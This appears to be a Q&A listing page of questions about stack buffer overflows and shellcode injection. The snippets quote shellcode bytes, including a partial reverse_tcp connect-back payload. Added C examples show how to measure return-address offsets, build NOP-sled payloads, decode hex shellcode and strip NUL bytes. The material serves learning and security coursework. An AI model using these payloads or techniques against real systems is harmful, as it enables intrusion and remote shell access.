1 vote, 2 answers, 71 views

Difficulties injecting shellcode with buffer overflow

For an assignment I am doing, I must inject shellcode to execute execve(/bin/bash) into the following C program: #include <stdio.h> #include <string.h> void return_input(void) { char ...
0 votes, 1 answer, 67 views

Illegal Instruction when trying to get shell from a simple stackoverflow

I'm trying to exploit the stack overflow vulnerability to get a shell. When I tried to run it, it shows "illegal hardware instruction" after executing the shellcode instead of giving a shell (error ...
0 votes, 2 answers, 86 views

shellcode buffer overflow - SegFault

I'm trying to run this shellcode but I keep getting segmentation fault /* call_shellcode.c */ /*A program that creates a file containing code for launching shell*/ #include <stdlib.h> #include ...
0 votes, 0 answers, 49 views

ASM shell spawner works, but fails in buffer overflow implementation

I have my assembly code: section .shellcode progbits alloc exec write align=16 global _start _start: xor rdx,rdx xor rbx,rbx xor rax,rax xor rsi,rsi xor rdi,rdi mov qword rbx,0x68732f6e69622f2f ...
0 votes, 1 answer, 60 views

BOF with non exec stack

I'm trying to pass level 2 of this "game" http://smashthestack.org/faq.html (connect via ssh to the blackbox server), which consists of a basic buffer overflow. In the directory /home/level2 (there ...
1 vote, 1 answer, 303 views

A buffer overflow exercise using a shellcode

I have been doing an exercise about a buffer overflow on a C program; the goal of this problem is to get a root shell once I have inserted a shellcode into the program. This is what I have until now: ...
1 vote, 1 answer, 134 views

Buffer overflow change return address C - without main

How can I get the eip register to point to memory address to execute my shellcode in the following program using buffer overflow? static int __init onload(void) { void function1(char *arg1) {...
-1 votes, 2 answers, 86 views

(radare2, shellcode) int 0x80 jumping to invalid address

I'm executing a 32bit program (my arch is 64bit). Vulnerable code: #include <string.h> #include <stdio.h> void main(int argc, char *argv[]) { copier(argv[1]); printf("Done!\n"); } ...
0 votes, 0 answers, 49 views

buffer overflow task, cannot run shellcode

I have been struggling for a week and cannot figure this out. Please help. My friend gave me an executable which is just a simple server and has a buffer overflow vulnerability. My goal is to get a ...
1 vote, 1 answer, 95 views

Shellcode not executed properly

I am trying to solve Protostar stack5. Here is a solution. It puts the shellcode after the return address; I tried to put it before, in the array. I have tried the shellcode, it works. It seems ...
1 vote, 2 answers, 157 views

return to libc attack using a function pointer

How should I format my input for the return to libc attack in the following code: void example_function(int x, const char *name) { void (*foo)(int, const char *) = http_serve_none; char buf[...
1 vote, 0 answers, 218 views

Why reverse_tcp Shellcode doesn't work?

I am using this shellcode: \x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\xc0\xa8\x0f\x81\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\...
0 votes, 1 answer, 131 views

Buffer overflow success only when using gdb

If I modify the return address directly with GDB, the buffer overflow succeeds and I can get a shell. However, when I don't use GDB, I can't get a shell with the same shellcode. I can't find any difference between ...
2 votes, 0 answers, 131 views

Buffer overflow attack with shell code

I used this shell code for buffer overflow attack $(python -c 'print "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x0f\x05\xc3"+"a"*31+"\x90\xe4\xff\xff\...
2 votes, 0 answers, 124 views

Shellcode Segfault - testcase vs strcpy

So after taking a Software Security class I became very interested in tinkering with how shellcode works with buffer overflows. Most threads I read about the topic involve having the shellcode as a ...
0 votes, 1 answer, 133 views

reverse move in stack without jmp

Update: Since I'm able to get the correct address into a register that I want to jump/call to, I think the best option would be to figure out a way to have self modifying code result in a jmp/call ...
0 votes, 0 answers, 152 views

Shellcode Without null bytes

I am trying to convert an assembly program into null-free shellcode. However, I am unsure how to go about this for certain instructions. Some of them are way more complex than the examples I found in the ...
1 vote, 1 answer, 159 views

Can't Reproduce Buffer Overflow Without GDB

I have been trying to troubleshoot this problem for a while. I have checked a few StackOverflow links with similar problems, but none of the fixes seemed to work for me. For some reason, instead of ...
0 votes, 1 answer, 1k views

What is the size of a return address?

I know that this might sound a bit noobish, but I can't find this anywhere. On a 64-bit machine, how many bytes is a return address? What about 32-bit? The reason I am asking is because I am learning ...
-2 votes, 1 answer, 241 views

Aleph one code - buffer overflow [closed]

I got this code from Aleph One: shellcode.h #if defined(__i386__) && defined(__linux__) #define NOP_SIZE 1 char nop[] = "\x90"; char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\...
1 vote, 1 answer, 858 views

Can you explain the method of finding the offset of a buffer when looking for buffer overflow potential

I'm looking at Aleph One's article in Phrack magazine. The code below can also be found there. We have a vulnerable executable whose code is: vulnerable.c void main(int argc, char *argv[]) { ...
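Added example, not code from either question: the question above asking how many bytes a return address is and this one about finding the buffer offset come down to the same measurement, and a C program can take it from inside its own frame. It assumes gcc or clang on x86 with the frame-pointer layout [locals including buf][saved ebp/rbp][return address]; `__builtin_frame_address` and `__builtin_return_address` exist in both compilers, and BUF_SIZE is an arbitrary size chosen for the demonstration.

```c
/* retaddr.c: measure, from inside a live frame, how big the saved return
 * address is and how far a local buffer sits from it.  Added example, not
 * code from either question.  Assumes the frame-pointer layout gcc/clang use
 * on x86:  [ locals incl. buf ][ saved ebp/rbp ][ return address ]. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64   /* arbitrary buffer size for the demonstration */

/* A return address is one machine pointer: 4 bytes on x86-32, 8 on x86-64. */
size_t return_address_size(void) { return sizeof(void *); }

/* 1 when compiled for x86, where the offset arithmetic below is meaningful
 * (on AArch64 locals sit above the frame record, so the sign flips). */
int x86_frame_layout(void) {
#if defined(__i386__) || defined(__x86_64__)
    return 1;
#else
    return 0;
#endif
}

/* Bytes from the first byte of `buf` to this frame's saved return address,
 * i.e. how much an overflow of `buf` must write before it reaches it.
 * Larger than BUF_SIZE because of alignment padding, a stack canary if
 * enabled, and the saved frame pointer. */
__attribute__((noinline)) ptrdiff_t offset_buf_to_retaddr(void) {
    volatile char buf[BUF_SIZE];
    memset((char *)buf, 'A', BUF_SIZE);              /* keep buf in the frame */
    char *fp = (char *)__builtin_frame_address(0);   /* slot holding saved fp */
    char *ret_slot = fp + sizeof(void *);            /* return address is above it */
    return ret_slot - (char *)buf;
}

/* Cross-check the layout: the word at fp + sizeof(void *) must be the very
 * address the compiler reports as this frame's return address. */
__attribute__((noinline)) int retaddr_slot_matches(void) {
    char *fp = (char *)__builtin_frame_address(0);
    void *from_stack;
    memcpy(&from_stack, fp + sizeof(void *), sizeof from_stack);
    return from_stack == __builtin_return_address(0);
}

int main(void) {
    printf("return address size : %zu bytes\n", return_address_size());
    printf("buf -> return addr  : %td bytes (buf itself is %d)\n",
           offset_buf_to_retaddr(), BUF_SIZE);
    printf("layout check        : %s\n", retaddr_slot_matches() ? "ok" : "mismatch");
    return 0;
}
```

The offset printed is exactly the count of filler bytes that must precede the return address in a payload for this binary; the same binary compiled with different flags (stack protector, optimisation level) will print a different value, which is why the offset is measured per target rather than computed from the buffer size alone.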
0 votes, 2 answers, 491 views

buffer overflow exploit change function call

I am trying to perform a buffer overflow to change the call from function A to function B. Is this do-able? I know I will have to figure out how many bytes I have to enter until I have control over ...
0 votes, 2 answers, 681 views

Exploit Development - Shellcode Doesn't Work?

I am following corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ to reproduce the exploit. Firstly, I found the position of EIP was after the 26089 As (at ...
0 votes, 1 answer, 244 views

get segmentation fault when executing shellcode

I'm trying to execute a program with shellcode injected into the stack (program taken from the securityTube.net tutorial, Megaprimer buffer overflow), a very good site (http://www.securitytube.net/). Our ...
0 votes, 0 answers, 355 views

Issue with assembly when trying to spawn shell

I am working on a buffer overflow in C, trying to get a shell to spawn. I have had little to no success in doing this. The closest I have gotten to accomplishing this was a segmentation fault when I believe ...
1 vote, 1 answer, 331 views

“Simple” buffer overflow in Windows 8

I'm trying to create two simple programs in C to simulate a buffer overflow: the first one accepts an input and copies it to memory; the second one abuses the first one to execute some shellcode that ...
0 votes, 2 answers, 588 views

Call function in buffer overflow

I'm learning about buffer overflows and found a challenge that has a program somewhat like this: int main() { do_something() return 0; } void do_something() { //get inputs printf("...
0 votes, 1 answer, 178 views

Find out the address of shellcode dynamically, placed on the stack

I am using shellcode to spawn a shell. I am curious to find out the starting address of the shellcode dynamically, which is placed on the stack, and not hard-code the address in the shellcode. Kindly share your ...
0 votes, 1 answer, 544 views

About buffer overflow shellcode position

I'm learning exploits. In all BOF examples, the shellcode is always placed in the buffer => shellcode + padding + overwritten return addr. Is it possible to place the shellcode after the return address ...
2 votes, 0 answers, 355 views

Why is eip not being overwritten with the shellcode I am overflowing with?

So I am having to do a buffer overflow for an assignment and I feel like I am very close. I must note that my teacher has set up a VM for us to use in which if we are able to get shellcode into the ...
3 votes, 1 answer, 459 views

Write buffer overflow exploit — how to figure out the address of the shellcode?

When writing buffer overflow exploit, I understand that I'll need to input an array of length (address_of_return_address - address_of_buffer). And the array needs to be filled with the address of the ...
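Added example, not code from either question: the layout question above ("About buffer overflow shellcode position") and this one both come down to putting the bytes in the right order. The C below builds both layouts (shellcode after the return address with a NOP sled in front of it, and shellcode inside the buffer with the address repeated), checks whether a chosen return address actually lands inside the sled once you know where the buffer sits, and reports the first NUL byte, which is where a strcpy- or argv-delivered payload would be cut off. Offsets, addresses and the two-byte stand-in shellcode (0xcc 0xcc, two int3 traps) are made up for the demonstration.

```c
/* payload.c: assemble a stack-overflow payload and sanity-check it.
 * Added example; not from the questions above.  All addresses and sizes
 * used in main() are invented for the demonstration. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { PTR32 = 4, PTR64 = 8 };

/* Little-endian store of `addr` in `ptr_size` bytes (x86 byte order). */
static void put_le(unsigned char *dst, uint64_t addr, size_t ptr_size) {
    for (size_t i = 0; i < ptr_size; i++)
        dst[i] = (unsigned char)(addr >> (8 * i));
}

/* Layout A, shellcode after the saved return address:
 *   [ 'A' * offset ][ ret ][ 0x90 * nops ][ shellcode ]
 * `offset` is the distance from the buffer start to the return-address slot.
 * Returns the payload length, 0 if it does not fit or ptr_size is bogus. */
size_t build_payload_sc_after_ret(unsigned char *out, size_t cap, size_t offset,
                                  uint64_t ret, size_t ptr_size, size_t nops,
                                  const unsigned char *sc, size_t sc_len) {
    size_t total = offset + ptr_size + nops + sc_len;
    if (total > cap || (ptr_size != PTR32 && ptr_size != PTR64)) return 0;
    memset(out, 'A', offset);
    put_le(out + offset, ret, ptr_size);
    memset(out + offset + ptr_size, 0x90, nops);
    memcpy(out + offset + ptr_size + nops, sc, sc_len);
    return total;
}

/* Layout B, shellcode inside the buffer, return address repeated so an
 * imprecise offset still hits it:
 *   [ 0x90 * nops ][ shellcode ][ 'A' pad ][ ret ][ ret ] ... */
size_t build_payload_sc_in_buf(unsigned char *out, size_t cap, size_t offset,
                               uint64_t ret, size_t ptr_size, size_t nops,
                               const unsigned char *sc, size_t sc_len,
                               size_t ret_copies) {
    if (nops + sc_len > offset || ret_copies == 0) return 0;  /* must fit below ret slot */
    size_t total = offset + ptr_size * ret_copies;
    if (total > cap || (ptr_size != PTR32 && ptr_size != PTR64)) return 0;
    memset(out, 0x90, nops);
    memcpy(out + nops, sc, sc_len);
    memset(out + nops + sc_len, 'A', offset - nops - sc_len);
    for (size_t i = 0; i < ret_copies; i++)
        put_le(out + offset + i * ptr_size, ret, ptr_size);
    return total;
}

/* Given where the buffer starts in the target (`buf_addr`), does `ret`
 * land anywhere inside the NOP sled?  One check per layout. */
int ret_hits_sled_after_ret(uint64_t buf_addr, size_t offset, size_t ptr_size,
                            size_t nops, uint64_t ret) {
    uint64_t sled = buf_addr + offset + ptr_size;
    return ret >= sled && ret < sled + nops;
}
int ret_hits_sled_in_buf(uint64_t buf_addr, size_t nops, uint64_t ret) {
    return ret >= buf_addr && ret < buf_addr + nops;
}

/* Index of the first NUL byte in the payload, or -1.  Everything after it
 * is lost when the payload travels through strcpy() or argv. */
long first_nul(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++) if (p[i] == 0) return (long)i;
    return -1;
}

int main(void) {
    static const unsigned char sc[] = { 0xcc, 0xcc };   /* stand-in: int3, int3 */
    unsigned char p[256];
    uint64_t buf_addr = 0xbffff560u;                     /* invented 32-bit stack address */
    size_t n = build_payload_sc_after_ret(p, sizeof p, 76, 0xbffff5b8u, PTR32, 16, sc, sizeof sc);
    printf("payload: %zu bytes, ret in sled: %d, first NUL: %ld\n", n,
           ret_hits_sled_after_ret(buf_addr, 76, PTR32, 16, 0xbffff5b8u), first_nul(p, n));
    for (size_t i = 0; i < n; i++) printf("%02x%c", p[i], (i % 16 == 15) ? '\n' : ' ');
    putchar('\n');
    return 0;
}
```

The NUL check matters most on 64-bit: a user-space address such as 0x00007fffffffe000 has two leading zero bytes, so in layout A the return address is the last thing strcpy would copy and layout B's repeated copies cannot work through a string function at all.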
0 votes, 1 answer, 125 views

Buffer overflow: shell does not spawn

I'm trying a buffer overflow on a simple program #include <stdio.h> int main(int argc, char **argv) { char buf[8]; gets(buf); printf("%s\n", buf); return 0; } ...
0 votes, 1 answer, 506 views

Solution to stack5.c (buffer stack overflow EIP) on x64

I am following the tutorials provided on the following links to learn how to insert shellcode through a buffer overflow and redirecting your EIP/RIP towards properly crafted shellcode to print you ...
-3 votes, 2 answers, 67 views

accessing a function that is defined after main

I have a C source file that I'm not allowed to change and it is defined as follows: int main(int argc, char *argv[]) { //doing something return 0 } void __magic() { __asm__("jmp %esp"); }...
0 votes, 1 answer, 424 views

shellcode spawning a shell

I have my assembly code to spawn a shell global _start section .text _start: xor eax, eax push eax push 0x68732f6e push 0x69622f2f mov ebx, esp push eax mov edx, esp ...
1 vote, 2 answers, 334 views

segmentation fault while running shellcode

I am experimenting with shellcode before digging deep into it, so I came across an example from the Shellcoder's Handbook. The example is the following: char shellcode[] = "\xeb\x1a\x5e\x31\xc0\x88\...
1 vote, 1 answer, 514 views

Inject Shellcode - program running and need to inject hexcode from maybe python

So I have a vulnerable program which is to be exploited using a buffer overflow. After analysis I have all the relevant values (buffer size, the address to be injected, etc.). The issue is that I need to ...
2 votes, 0 answers, 747 views

How to buffer overflow the 'gets' method in Ruby?

I wrote a client that gets input from the keyboard and stores it in a variable, like so: x = gets In C, normally memory is allocated for standard input and thus I can easily overflow the buffer and ...
-1 votes, 1 answer, 137 views

need to detect any possible buffer overflows

Hi guys, I need some help with this code. I want to know if there is any buffer overflow in this code. Basically this is an exercise for my university. We need to exploit it to open a shell. Until now ...
1 vote, 0 answers, 472 views

Why do I still get stack cookie exception although I disabled /GS flag in VS11 when compiling? Scenario: buffer overflow tutorial test

Recently I have tried to test a tutorial application on demonstrating buffer overflows, written in C. I used the Visual Studio 2012 toolchain to compile and link the sources, and made sure the ...
0 votes, 1 answer, 103 views

How to insert complex input in gdb dynamically

I need to insert shellcode and its address, but I can detect the address of the buffer only after I run the program in gdb. The input is complex. If I knew the address, I would run the program like ...
0 votes, 1 answer, 313 views

problems with a ret2eax

I had some problems trying to overwrite the saved return address. Here is my code: #include <stdio.h> #include <string.h> void foo(char *source) { char buf[...
0 votes, 1 answer, 278 views

Runs in gdb but not out of gdb

I am trying to spawn a shell with some shellcode. The payload is in the program itself; however, when I run the program individually I get a segmentation fault, but when running in gdb, my shell ...
2 votes, 1 answer, 969 views

Cannot access return address on x86-32

I am trying my luck with buffer overflows, however, I am stuck at one point. I overwrite the return address, so that EIP will point into the address of the nop sled of my shellcode. However, when ret ...
4 votes, 2 answers, 5k views

Treat input as hex values

I am trying to learn how to create shellcode and I need to input a whole bunch of hex codes. However, when I give my program an input with hex codes, the hex codes are treated as normal ASCII ...
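Added example, not the asker's code: the usual fix is to generate the raw bytes outside the target with printf or python, but a small C converter makes the point explicit. The program below decodes a string of "\xHH" escapes (or bare hex pairs) into the bytes they denote and writes them to stdout, so the target receives 0x31 rather than the four characters backslash, x, 3, 1. The sample inputs are assumptions for the demonstration.

```c
/* hex2raw.c: turn a textual shellcode string such as "\x31\xc0\x50" (or bare
 * hex "31 c0 50") into the raw bytes a target must actually receive.
 * Added example; not code from the question above. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static int nibble(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;                                   /* not a hex digit */
}

/* Decode `in` into `out` (capacity `cap`).  Accepts "\xHH" escapes and bare
 * hex pairs; whitespace between bytes is skipped.  Returns the number of
 * bytes written, or 0 on malformed input or if `out` is too small. */
size_t decode_hex_bytes(const char *in, unsigned char *out, size_t cap) {
    size_t n = 0;
    while (*in) {
        if (isspace((unsigned char)*in)) { in++; continue; }
        if (in[0] == '\\' && (in[1] == 'x' || in[1] == 'X')) in += 2;
        int hi = nibble((unsigned char)in[0]);
        int lo = (hi < 0) ? -1 : nibble((unsigned char)in[1]);
        if (lo < 0 || n >= cap) return 0;        /* odd digit count, junk, or overflow */
        out[n++] = (unsigned char)((hi << 4) | lo);
        in += 2;
    }
    return n;
}

/* Convenience check: does `in` decode to exactly the `n` bytes in `want`? */
int decodes_to(const char *in, const unsigned char *want, size_t n) {
    unsigned char buf[512];
    size_t got = decode_hex_bytes(in, buf, sizeof buf);
    return got == n && memcmp(buf, want, n) == 0;
}

/* Usage:  ./hex2raw '\x31\xc0\x50' > payload ;  ./vuln "$(cat payload)"
 * Once decoded, a 0x00 byte terminates the string as far as argv or strcpy
 * are concerned, so inspect the output for NULs before relying on it. */
int main(int argc, char **argv) {
    unsigned char raw[4096];
    if (argc != 2) {
        fprintf(stderr, "usage: %s '<\\xHH string or bare hex>'\n", argv[0]);
        return 2;
    }
    size_t n = decode_hex_bytes(argv[1], raw, sizeof raw);
    if (n == 0) { fprintf(stderr, "malformed hex input\n"); return 1; }
    fwrite(raw, 1, n, stdout);
    return 0;
}
```

The decoder deliberately rejects an odd number of digits instead of guessing, since a silently dropped nibble shifts every following instruction byte and produces exactly the "illegal instruction" crashes seen elsewhere on this page.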
8 votes, 2 answers, 9k views

Simple buffer overflow and shellcode example

I've been trying to run Aleph One's example in order to get a BOF and open a shell. This is Aleph One paper: http://insecure.org/stf/smashstack.html And this is the simple C code (located nearly at ...
0 votes, 1 answer, 289 views

My payload for buffer overflow seems to be not working

I am trying a buffer overflow on the following program: #include <stdio.h> #include <stdlib.h> extern char **environ; main(int argc, char *argv[]){ char buffer[40]; int i; if(...
0 votes, 0 answers, 119 views

locating null bytes in shellcode

I have injected my exit syscall shellcode bb 14 00 00 00 b8 01 00 00 00 cd 80; in spite of having null bytes it works. I don't know why. On the other hand, when I try to execute an execve ...
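Added example, not code from the question: the first byte string below is the exit shellcode quoted above; the null-free rewrite of it is ours (mov ebx,0x14 becomes xor ebx,ebx / mov bl,0x14, the standard transformation, which also answers the earlier question on this page about writing null-free shellcode). The scanner reports every NUL in a buffer and shows how much of the payload survives a strcpy, which is where NULs actually bite: copied with memcpy or called directly from a C array they are harmless, which is consistent with the exit shellcode working in the question.

```c
/* nullcheck.c: find NUL bytes in shellcode and show why they break
 * string-based delivery.  Added example; the first array is the byte
 * string quoted in the question, the second is our null-free rewrite. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* mov ebx,0x14 ; mov eax,1 ; int 0x80 -- 32-bit immediates carry NULs */
static const unsigned char exit_with_nulls[] = {
    0xbb, 0x14, 0x00, 0x00, 0x00,   /* mov ebx, 0x14 */
    0xb8, 0x01, 0x00, 0x00, 0x00,   /* mov eax, 1    */
    0xcd, 0x80                      /* int 0x80      */
};

/* Same syscall, zeroing with xor and loading 8-bit sub-registers instead */
static const unsigned char exit_null_free[] = {
    0x31, 0xdb,                     /* xor ebx, ebx */
    0xb3, 0x14,                     /* mov bl, 0x14 */
    0x31, 0xc0,                     /* xor eax, eax */
    0xb0, 0x01,                     /* mov al, 1    */
    0xcd, 0x80                      /* int 0x80     */
};

/* Records the offset of each NUL byte in `offs` (up to `cap` of them) and
 * returns the total count, so a caller can tell which instructions to fix. */
size_t find_nul_bytes(const unsigned char *sc, size_t len, size_t *offs, size_t cap) {
    size_t count = 0;
    for (size_t i = 0; i < len; i++)
        if (sc[i] == 0) { if (count < cap) offs[count] = i; count++; }
    return count;
}

/* How many bytes arrive when the payload goes through strcpy(): the copy
 * stops at the first NUL, everything after it is silently dropped. */
size_t bytes_surviving_strcpy(const unsigned char *sc, size_t len) {
    char src[256], dst[256];
    if (len >= sizeof src) return 0;
    memcpy(src, sc, len);
    src[len] = '\0';
    strcpy(dst, src);
    return strlen(dst);
}

static void report(const char *name, const unsigned char *sc, size_t len) {
    size_t offs[32];
    size_t n = find_nul_bytes(sc, len, offs, 32);
    printf("%s: %zu bytes, %zu NUL(s)", name, len, n);
    for (size_t i = 0; i < n && i < 32; i++) printf("%s%zu", i ? "," : " at offsets ", offs[i]);
    printf("; %zu byte(s) survive strcpy\n", bytes_surviving_strcpy(sc, len));
}

int main(void) {
    report("exit_with_nulls", exit_with_nulls, sizeof exit_with_nulls);
    report("exit_null_free ", exit_null_free, sizeof exit_null_free);
    return 0;
}
```

Run the same scan over any execve shellcode before injecting it: an immediate or address that encodes with zero bytes will show up here long before it shows up as a truncated copy and a segfault in the target.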
0 votes, 1 answer, 1k views

buffer overflow exploit example from “Hacking: The Art of Exploitation”

I've found a few related posts about this on the site but none of them explained my problem. The code is described here: Link. My issue is the following: the author tries to rewrite the return address ...
5 votes, 4 answers, 13k views

Using buffer overflow to execute shell code

I've been learning computer security lately and have come across a couple of problems, and I'm having some trouble with this one in particular. I'm given a function with a fixed buffer I need to overflow in ...